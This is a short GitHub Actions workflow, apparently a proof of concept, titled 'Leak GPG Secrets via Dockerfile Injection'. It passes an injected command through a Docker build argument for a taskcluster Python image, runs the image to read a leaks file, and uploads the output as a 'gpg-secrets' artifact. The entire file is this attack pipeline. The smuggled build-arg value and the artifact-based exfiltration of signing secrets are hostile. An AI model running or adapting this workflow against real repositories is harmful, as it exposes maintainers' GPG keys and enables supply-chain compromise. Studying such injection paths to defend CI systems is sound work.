name: Leak GPG Secrets via Dockerfile Injection

on:
  workflow_dispatch:

jobs:
  gpg-exfil:
    runs-on: ubuntu-latest
    steps:
      - name: Checkout
        uses: actions/checkout@v4

      - name: Build with injected command
        run: |
          docker build \
            --build-arg PYTHON_VERSION="echo 'Injecting...'" \
            -t leak-image ./taskcluster/docker/python

      - name: Run and capture leaks
        run: |
          docker run --rm leak-image cat /leaks.txt > gpg_leak.txt

      - name: Upload leaked GPG secrets
        uses: actions/upload-artifact@v3
        with:
          name: gpg-secrets
          path: gpg_leak.txt
